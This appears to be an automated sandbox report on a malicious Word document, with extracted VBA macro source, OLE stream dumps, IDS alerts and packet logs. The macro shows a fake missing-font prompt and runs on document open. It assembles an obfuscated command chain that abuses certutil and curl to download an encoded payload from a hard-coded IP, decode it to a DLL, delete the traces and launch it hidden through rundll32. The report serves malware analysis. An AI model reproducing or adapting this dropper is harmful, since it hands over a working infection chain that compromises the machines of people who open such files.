" + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) +     " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + ChrW(-3) + " " + ChrW(-3)
                                  .InsertParagraphAfter
                                  End With
                              End Sub
                              
                              'Show msgbox
                              Sub MsgFunc()
                                  Dim Msg, Style, Title, Help, Ctxt, Response, MyString
                                  Msg = "The document cannot be fully displayed due to missing fonts. Do you want to install missing fonts?"    ' Define message.
                                  Style = vbYesNo Or vbCritical Or vbDefaultButton2    ' Define buttons.
                                  Title = "Missing font"    ' Define title.
                                  Help = "DEMO.HLP"    ' Define Help file.
                                  Ctxt = 1000    ' Define topic context.
                                  ' Display message.
                                  Response = MsgBox(Msg, Style, Title, Help, Ctxt)
                                  If Response = vbYes Then    ' User chose Yes.
                                      MyString = "Yes"    ' Perform some action.
                                      DeleteText
                                  Else    ' User chose No.
                                      MyString = "No"    ' Perform some action.
                                      'MsgFunc
                                  End If
                              End Sub
                              
                              Sub MainFunc()
                                  Dim curl_enc_txt_path As String
                                  Dim curl_dec_exe_path As String
                                  Dim mal_enc_txt_url As String
                                  Dim mal_enc_txt_path As String
                                  Dim mal_dec_exe_path As String
                                  Dim pp As String
                                  Dim cc As String
                                  Dim dir As String
                                  Dim host As String
                              
                                  dir = ActiveDocument.Path
                                  dir = Environ("temp")
                                  host = "http://172.104.160.126:8099"
                                  curl_enc_txt_path = dir + "\curl.txt"
                                  curl_dec_exe_path = dir + "\curl.exe"
                              
                                  mal_enc_txt_url = host + "/payload2.txt"
                                  mal_enc_txt_path = dir + "\mscorsvc.txt"
                                  mal_dec_exe_path = dir + "\mscorsvc.dll"
                              
                                  pp = pp + "C:\Windows\Sys"
                                  pp = pp + "tem32\cmd.exe /c "
                                  cc = cc + curl_enc_txt_path + curl_dec_exe_path
                                  pp = pp + "xcopy C:\Windows\Sys"
                                  cc = cc + curl_enc_txt_path + mal_enc_txt_url
                                  pp = pp + "tem32\cu" + "rl.exe " + dir + " & "
                                  cc = cc + mal_enc_txt_path + mal_enc_txt_url
                                  pp = pp + "certutil -f "
                                  cc = cc + mal_enc_txt_path + mal_dec_exe_path
                                  pp = pp + "-encode " + dir + "\cu" + "rl.exe " + curl_enc_txt_path + " & "
                                  cc = cc + pp + mal_dec_exe_path
                                  pp = pp + "certutil -f "
                                  cc = cc + pp + dir
                                  pp = pp + "-decode " + curl_enc_txt_path + " " + curl_dec_exe_path + " & "
                                  cc = cc + curl_enc_txt_path + dir
                              
                                  pp = pp + curl_dec_exe_path + " " + mal_enc_txt_url + " -o " + mal_enc_txt_path + " & "
                                  cc = cc + curl_enc_txt_path + dir
                                  pp = pp + "certutil -f "
                                  cc = cc + curl_enc_txt_path + curl_dec_exe_path
                                  pp = pp + "-decode " + mal_enc_txt_path + " " + mal_dec_exe_path + " & "
                                  cc = cc + mal_enc_txt_url + curl_dec_exe_path
                              
                                  pp = pp + "del " + dir + "\cu" + "rl.exe & "
                                  cc = cc + host + pp + curl_enc_txt_path
                                  pp = pp + "del " + curl_enc_txt_path + " & "
                                  cc = cc + curl_enc_txt_path + dir
                                  pp = pp + "del " + curl_dec_exe_path + " & "
                                  cc = cc + curl_dec_exe_path + pp
                              
                                  pp = pp + "del " + mal_enc_txt_path + " & "
                                  cc = cc + mal_enc_txt_path + pp
                              
                                  Dim vbDblQuote As String
                                  vbDblQuote = Chr(34)
                                  pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
                                  cc = cc + mal_dec_exe_path + pp
                              
                                  pp = pp + "exit"
                                  cc = cc + dir + pp
                                  'pp = pp + "cmd.exe -d & exit"
                                  'cc = cc + mal_enc_txt_url + curl_dec_exe_path
                                  ' Shell (pp), vbHidden
                              
                                  Dim objShell As Object
                                  Set objShell = CreateObject("WScript.Shell")
                                  objShell.Run pp, 0, False
                              End Sub
                              
                              
                              Sub Document_Open()
                                  MainFunc
                              End Sub
                              
                              
                              

                              General
                              Stream Path:PROJECT
                              CLSID:
                              File Type:ASCII text, with CRLF line terminators
                              Stream Size:376
                              Entropy:5.349004928853029
                              Base64 Encoded:True
                              Data ASCII:I D = " { 6 3 9 4 0 D 1 7 - 7 B C 7 - 4 1 4 6 - B A 9 5 - 1 3 8 9 F F 7 0 2 C 5 8 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 5 D 7 6 E 4 7 9 6 1 8 9 A 1 8 9 A 1 8 9 A 1 8 9 A " . . D P B = " A A A 8 1 1 B 6 E 7 B 7 E 7 B 7 E 7 " . . G C = " 7 F 7 D C 4 E D 4 C 1 7 2 0 1 8 2 0 1 8 D F " . . . . [ H o s t E x t e n d e r I n f
                              Data Raw:49 44 3d 22 7b 36 33 39 34 30 44 31 37 2d 37 42 43 37 2d 34 31 34 36 2d 42 41 39 35 2d 31 33 38 39 46 46 37 30 32 43 35 38 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69
                              General
                              Stream Path:PROJECTwm
                              CLSID:
                              File Type:data
                              Stream Size:41
                              Entropy:3.0773844850752607
                              Base64 Encoded:False
                              Data ASCII:T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . . .
                              Data Raw:54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 00 00
                              General
                              Stream Path:VBA/_VBA_PROJECT
                              CLSID:
                              File Type:data
                              Stream Size:2976
                              Entropy:4.617966626265468
                              Base64 Encoded:False
                              Data ASCII:a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 1 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o
                              Data Raw:cc 61 b2 00 00 03 00 ff 09 04 00 00 09 04 00 00 e4 04 03 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
                              General
                              Stream Path:VBA/__SRP_0
                              CLSID:
                              File Type:data
                              Stream Size:2782
                              Entropy:3.5082390293182035
                              Base64 Encoded:False
                              Data ASCII:K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ J . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . U . B - . . . . . . . . . . . . . .
                              Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                              General
                              Stream Path:VBA/__SRP_1
                              CLSID:
                              File Type:data
                              Stream Size:174
                              Entropy:1.6032810527820052
                              Base64 Encoded:False
                              Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                              Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 06 00 00 00 00 00 00 09 11 04 00 00 00 00
                              General
                              Stream Path:VBA/__SRP_2
                              CLSID:
                              File Type:data
                              Stream Size:1224
                              Entropy:2.0062113510689086
                              Base64 Encoded:False
                              Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . Q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . q . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                              Data Raw:72 55 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 05 00 05 00 05 00 00 00 31 09 00 00 00 00 00 00 00 00 00 00 11 0c 00 00 00 00 00 00 00 00 00 00 51 0d 00 00 00 00 00 00 00 00
                              General
                              Stream Path:VBA/__SRP_3
                              CLSID:
                              File Type:data
                              Stream Size:356
                              Entropy:2.1693699541959686
                              Base64 Encoded:False
                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . .
                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 38 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 00 00 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                              General
                              Stream Path:VBA/dir
                              CLSID:
                              File Type:data
                              Stream Size:514
                              Entropy:6.2857106919283545
                              Base64 Encoded:True
                              Data ASCII:. . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . l . . . . . . . . > h . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t o m a t i o n . ` . . . E N o r m a l . E N C r . m . a Q F . . . . . * \\ C . . . . . m A ! O f f i c g O D . f . i . c g . . ! G {
                              Data Raw:01 fe b1 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 e3 3e ab 68 02 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30
                              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                              2024-07-22T15:58:45.771195+0200TCP2029280ET MALWARE Observed Certificate Base64 Encoded Executable Inbound809949195172.104.160.126192.168.2.6
                              2024-07-22T15:57:48.044440+0200TCP2029280ET MALWARE Observed Certificate Base64 Encoded Executable Inbound809949717172.104.160.126192.168.2.6
                              TimestampSource PortDest PortSource IPDest IP
                              Jul 22, 2024 15:57:37.290169954 CEST49673443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:37.290256977 CEST49674443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:37.618436098 CEST49672443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:46.593611002 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:46.593657017 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:46.593781948 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:46.593995094 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:46.594027996 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:46.611236095 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:46.611321926 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:46.611478090 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:46.612370968 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:46.612407923 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:46.689435959 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:46.695535898 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:46.695604086 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:46.718877077 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:46.723723888 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:46.899533033 CEST49673443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:46.899660110 CEST49674443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:47.227660894 CEST49672443192.168.2.6173.222.162.64
                              Jul 22, 2024 15:57:47.923765898 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.924438000 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.924448967 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.924458027 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.924504995 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.924529076 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.925273895 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.925286055 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.925296068 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.925307035 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.925337076 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.925355911 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.926068068 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.926084042 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.926095009 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.926152945 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.926978111 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.927090883 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.942838907 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.942893028 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.943176985 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.943187952 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.943279028 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.943407059 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.944150925 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.944161892 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.944170952 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.944180012 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.944192886 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.944237947 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.945236921 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.945250034 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.945307970 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.946266890 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.946276903 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.946305037 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.947113991 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.947124004 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.947128057 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.947138071 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.947166920 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.948944092 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.948954105 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.949001074 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.950728893 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.950809002 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.951641083 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.951652050 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.951662064 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.951670885 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:47.951699018 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:47.951725960 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.044440031 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.044703007 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.044751883 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.130525112 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:48.130584002 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:48.130661011 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:48.131546974 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:48.133389950 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:48.133418083 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:48.133835077 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:48.135431051 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:48.135663033 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:48.135675907 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:48.136001110 CEST49715443192.168.2.640.113.103.199
                              Jul 22, 2024 15:57:48.144507885 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:48.144521952 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:48.144990921 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:48.145420074 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:48.145600080 CEST49714443192.168.2.640.126.31.69
                              Jul 22, 2024 15:57:48.145652056 CEST4434971440.126.31.69192.168.2.6
                              Jul 22, 2024 15:57:48.176534891 CEST4434971540.113.103.199192.168.2.6
                              Jul 22, 2024 15:57:48.185066938 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185121059 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185154915 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185205936 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.185282946 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185316086 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185333014 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.185348988 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185420036 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.185475111 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185611010 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185642958 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185659885 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.185776949 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185808897 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185822964 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.185842991 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.185913086 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.186377048 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186430931 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186464071 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186507940 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.186599970 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186633110 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186646938 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.186667919 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.186753035 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.187242031 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187321901 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187355995 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187380075 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.187614918 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187654018 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187688112 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.187704086 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.187730074 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.188210964 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188261986 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188294888 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188337088 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.188410044 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188458920 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.188462019 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188522100 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.188571930 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.189114094 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189186096 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189218998 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189263105 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.189321995 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189354897 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189372063 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.189387083 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189448118 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.189908981 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.189944983 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.190043926 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.277548075 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.277580023 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.277595043 CEST809949717172.104.160.126192.168.2.6
                              Jul 22, 2024 15:57:48.277637959 CEST497178099192.168.2.6172.104.160.126
                              Jul 22, 2024 15:57:48.277772903 CEST809949717172.104.160.126192.168.2.6
